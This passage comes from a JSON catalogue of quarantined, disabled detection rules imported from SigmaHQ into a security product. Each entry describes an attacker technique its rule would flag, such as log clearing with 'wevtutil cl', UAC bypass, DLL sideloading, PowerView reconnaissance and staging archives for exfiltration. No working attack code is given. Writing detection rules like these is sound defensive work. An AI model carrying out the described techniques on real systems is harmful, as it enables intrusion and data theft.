service accounts, LOCAL_SYSTEM)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.001", "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-group-and-account-reconnaissance-activity-using-net-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d95de845-b83c-4a9a-8a6a-4fc802ebf6c0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_net_groups_and_accounts_recon.yml" } }, { "id": "sigmahq-sigma-d99b79d2-0a6f-4f46-ad8b-260b6e17f982", "type": "detection", "name": "Security Eventlog Cleared", "description": "One of the Windows Eventlogs has been cleared. e.g. 
caused by \"wevtutil cl\" command execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/security-eventlog-cleared.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_audit_log_cleared.yml" } }, { "id": "sigmahq-sigma-da2738f2-fadb-4394-afa7-0a0674885afa", "type": "detection", "name": "Sdclt Child Processes", "description": "A General detection for sdclt spawning new processes. 
This could be an indicator of sdclt being used for bypass UAC techniques.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sdclt-child-processes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "da2738f2-fadb-4394-afa7-0a0674885afa", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sdclt_child_process.yml" } }, { "id": "sigmahq-sigma-da34e323-1e65-42db-83be-a6725ac2caa3", "type": "detection", "name": "Potential Packet Capture Activity Via Start-NetEventSession - ScriptBlock", "description": "Detects the execution of powershell scripts with calls to the \"Start-NetEventSession\" cmdlet. 
This cmdlet allows an attacker to start event and packet capture for a network event session.\nAdversaries may attempt to capture network traffic to gather information over the course of an operation.\nData captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1040" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-packet-capture-activity-via-start-neteventsession-scriptblock.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "da34e323-1e65-42db-83be-a6725ac2caa3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_packet_capture.yml" } }, { "id": "sigmahq-sigma-dae8171c-5ec6-4396-b210-8466585b53e9", "type": "detection", "name": "SCM Database Privileged Operation", "description": "Detects non-system users performing privileged operations on the SCM database", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/scm-database-privileged-operation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dae8171c-5ec6-4396-b210-8466585b53e9", "source_commit": "df5c6a6", "license": "DRL-1.1", 
"license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_scm_database_privileged_operation.yml" } }, { "id": "sigmahq-sigma-daf7eb81-35fd-410d-9d7a-657837e602bb", "type": "detection", "name": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Module", "description": "Detects PowerShell scripts that make use of the \"Compress-Archive\" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration.\nAn adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1074.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/zip-a-folder-with-powershell-for-staging-in-temp-powershell-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "daf7eb81-35fd-410d-9d7a-657837e602bb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_susp_zip_compress.yml" } }, { "id": "sigmahq-sigma-db014773-7375-4f4e-b83b-133337c0ffee", "type": "detection", "name": "AWS IAM S3Browser Templated S3 Bucket Policy Creation", "description": "Detects S3 browser utility creating Inline IAM policy containing default S3 bucket name placeholder value of \"\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], 
"severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.009", "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-iam-s3browser-templated-s3-bucket-policy-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "db014773-7375-4f4e-b83b-133337c0ffee", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_iam_s3browser_templated_s3_bucket_policy_creation.yml" } }, { "id": "sigmahq-sigma-db014773-b1d3-46bd-ba26-133337c0ffee", "type": "detection", "name": "AWS IAM S3Browser LoginProfile Creation", "description": "Detects S3 Browser utility performing reconnaissance looking for existing IAM Users without a LoginProfile defined then (when found) creating a LoginProfile.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.009", "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-iam-s3browser-loginprofile-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "db014773-b1d3-46bd-ba26-133337c0ffee", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_iam_s3browser_loginprofile_creation.yml" } }, { "id": "sigmahq-sigma-db014773-d9d9-4792-91e5-133337c0ffee", "type": 
"detection", "name": "AWS IAM S3Browser User or AccessKey Creation", "description": "Detects S3 Browser utility creating IAM User or AccessKey.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.009", "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-iam-s3browser-user-or-accesskey-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "db014773-d9d9-4792-91e5-133337c0ffee", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_iam_s3browser_user_or_accesskey_creation.yml" } }, { "id": "sigmahq-sigma-db1ac3be-f606-4e3a-89e0-9607cbe6b98a", "type": "detection", "name": "Capsh Shell Invocation - Linux", "description": "Detects the use of the \"capsh\" utility to invoke a shell.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/capsh-shell-invocation-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "db1ac3be-f606-4e3a-89e0-9607cbe6b98a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_capsh_shell_invocation.yml" } }, { "id": 
"sigmahq-sigma-db1c21e4-cd66-4b4e-85ca-590f0780529c", "type": "detection", "name": "Windows Recovery Environment Disabled Via Reagentc", "description": "Detects attempts to disable windows recovery environment using Reagentc.\nReAgentc.exe is a command-line tool in Windows used to manage the Windows Recovery Environment (WinRE).\nIt allows users to enable, disable, and configure WinRE, which is used for troubleshooting and repairing common boot issues.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-recovery-environment-disabled-via-reagentc.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "db1c21e4-cd66-4b4e-85ca-590f0780529c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reagentc_disable_windows_recovery_environment.yml" } }, { "id": "sigmahq-sigma-db6c06c4-bf3b-421c-aa88-15672b88c743", "type": "detection", "name": "Changes To PIM Settings", "description": "Detects when changes are made to PIM roles", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/changes-to-pim-settings.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", 
"source_id": "db6c06c4-bf3b-421c-aa88-15672b88c743", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_pim_change_settings.yml" } }, { "id": "sigmahq-sigma-db77ce78-7e28-4188-9337-cf30e2b3ba9f", "type": "detection", "name": "Potential Wazuh Security Platform DLL Sideloading", "description": "Detects potential DLL side loading of DLLs that are part of the Wazuh security platform", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-wazuh-security-platform-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "db77ce78-7e28-4188-9337-cf30e2b3ba9f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_wazuh.yml" } }, { "id": "sigmahq-sigma-db809f10-56ce-4420-8c86-d6a7d793c79c", "type": "detection", "name": "Potential Defense Evasion Via Raw Disk Access By Uncommon Tools", "description": "Detects raw disk access using uncommon tools or tools that are located in suspicious locations (heavy filtering is required), which could indicate possible defense evasion attempts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/potential-defense-evasion-via-raw-disk-access-by-uncommon-tools.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "db809f10-56ce-4420-8c86-d6a7d793c79c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/raw_access_thread/raw_access_thread_susp_disk_access_using_uncommon_tools.yml" } }, { "id": "sigmahq-sigma-db885529-903f-4c5d-9864-28fe199e6370", "type": "detection", "name": "Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell", "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/computer-discovery-and-export-via-get-adcomputer-cmdlet-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "db885529-903f-4c5d-9864-28fe199e6370", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml" } }, { "id": "sigmahq-sigma-db92dd33-a3ad-49cf-8c2c-608c3e30ace0", "type": "detection", "name": "Invoke-Obfuscation Via Use Clip - Powershell", "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ 
"categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-via-use-clip-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_clip.yml" } }, { "id": "sigmahq-sigma-dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c", "type": "detection", "name": "Potential Initial Access via DLL Search Order Hijacking", "description": "Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. 
This may indicate an attempt to load a malicious module via DLL search order hijacking.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566", "T1566.001", "T1574", "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-initial-access-via-dll-search-order-hijacking.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_initial_access_dll_search_order_hijacking.yml" } }, { "id": "sigmahq-sigma-dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", "type": "detection", "name": "Delete Important Scheduled Task", "description": "Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/delete-important-scheduled-task.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_schtasks_delete.yml" } }, { "id": "sigmahq-sigma-dbe4b9c5-c254-4258-9688-d6af0b7967fd", "type": "detection", "name": "Screen Capture with Import Tool", "description": "Detects adversary creating screen capture of a desktop with Import Tool.\nHighly recommended using rule on servers, due to high usage of screenshot utilities on user workstations.\nImageMagick must be installed.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1113" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/screen-capture-with-import-tool.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dbe4b9c5-c254-4258-9688-d6af0b7967fd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_screencapture_import.yml" } }, { "id": "sigmahq-sigma-dbfc7c98-04ab-4ab7-aa94-c74d22aa7376", "type": "detection", "name": "Potentially Suspicious Malware Callback Communication - Linux", "description": "Detects programs that connect to known malware callback ports based on threat intelligence reports.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1571" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-malware-callback-communication-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", 
"provenance": { "source": "SigmaHQ/sigma", "source_id": "dbfc7c98-04ab-4ab7-aa94-c74d22aa7376", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/network_connection/net_connection_lnx_susp_malware_callback_port.yml" } }, { "id": "sigmahq-sigma-dc4576d4-7467-424f-9eee-fd2b02855fe0", "type": "detection", "name": "Suspicious Cabinet File Execution Via Msdt.EXE", "description": "Detects execution of msdt.exe using the \"cab\" flag which could indicate suspicious diagcab files with embedded answer files leveraging CVE-2022-30190", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-cabinet-file-execution-via-msdt-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dc4576d4-7467-424f-9eee-fd2b02855fe0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_msdt_susp_cab_options.yml" } }, { "id": "sigmahq-sigma-dc5c24af-6995-49b2-86eb-a9ff62199e82", "type": "detection", "name": "COM Hijacking via TreatAs", "description": "Detects modification of the TreatAs key to enable the \"rundll32.exe -sta\" command", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.015" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/com-hijacking-via-treatas.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dc5c24af-6995-49b2-86eb-a9ff62199e82", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_treatas_persistence.yml" } }, { "id": "sigmahq-sigma-dca8991c-cb16-4128-abf8-6b11e5cd156f", "type": "detection", "name": "GitHub Repository Archive Status Changed", "description": "Detects when a GitHub repository is archived or unarchived, which may indicate unauthorized changes to repository status.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/github-repository-archive-status-changed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dca8991c-cb16-4128-abf8-6b11e5cd156f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/github/audit/github_repository_archive_status_changed.yml" } }, { "id": "sigmahq-sigma-dcaa3f04-70c3-427a-80b4-b870d73c94c4", "type": "detection", "name": "Dynamic .NET Compilation Via Csc.EXE", "description": "Detects execution of \"csc.exe\" to compile .NET code. 
Attackers often leverage this to compile code on the fly and use it in other stages.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dynamic-net-compilation-via-csc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dcaa3f04-70c3-427a-80b4-b870d73c94c4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_csc_susp_dynamic_compilation.yml" } }, { "id": "sigmahq-sigma-dcd74b95-3f36-4ed9-9598-0490951643aa", "type": "detection", "name": "PowerView PowerShell Cmdlets - ScriptBlock", "description": "Detects Cmdlet names from PowerView of the PowerSploit exploitation framework.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powerview-powershell-cmdlets-scriptblock.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dcd74b95-3f36-4ed9-9598-0490951643aa", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml" } }, { "id": 
"sigmahq-sigma-dcdbc940-0bff-46b2-95f3-2d73f848e33b", "type": "detection", "name": "Suspicious Spool Service Child Process", "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1203", "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-spool-service-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_spoolsv_susp_child_processes.yml" } }, { "id": "sigmahq-sigma-dcf2db1f-f091-425b-a821-c05875b8925a", "type": "detection", "name": "Invoke-Obfuscation VAR+ Launcher - Security", "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-var-launcher-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dcf2db1f-f091-425b-a821-c05875b8925a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": 
"2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_invoke_obfuscation_var_services_security.yml" } }, { "id": "sigmahq-sigma-dcff7e85-d01f-4eb5-badd-84e2e6be8294", "type": "detection", "name": "Windows Default Domain GPO Modification via GPME", "description": "Detects the use of the Group Policy Management Editor (GPME) to modify Default Domain or Default Domain Controllers Group Policy Objects (GPOs).\nAdversaries may leverage GPME to make stealthy changes in these default GPOs to deploy malicious GPO configurations across the domain without raising suspicion.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1484.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-default-domain-gpo-modification-via-gpme.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dcff7e85-d01f-4eb5-badd-84e2e6be8294", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mmc_default_domain_gpo_modification_via_gpme.yml" } }, { "id": "sigmahq-sigma-dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c", "type": "detection", "name": "Suspicious Scheduled Task Creation via Masqueraded XML File", "description": "Detects the creation of a scheduled task using the \"-XML\" flag with a file without the '.xml' extension. 
This behavior could be indicative of potential defense evasion attempt during persistence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.005", "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-scheduled-task-creation-via-masqueraded-xml-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "dd2a821e-3b07-4d3b-a9ac-929fe4c6ca0c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml" } }, { "id": "sigmahq-sigma-dd3ee8cc-f751-41c9-ba53-5a32ed47e563", "type": "detection", "name": "Registry Modification of MS-settings Protocol Handler", "description": "Detects registry modifications to the 'ms-settings' protocol handler, which is frequently targeted for UAC bypass or persistence.\nAttackers can modify this registry to execute malicious code with elevated privileges by hijacking the command execution path.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002", "T1546.001", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/registry-modification-of-ms-settings-protocol-handler.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
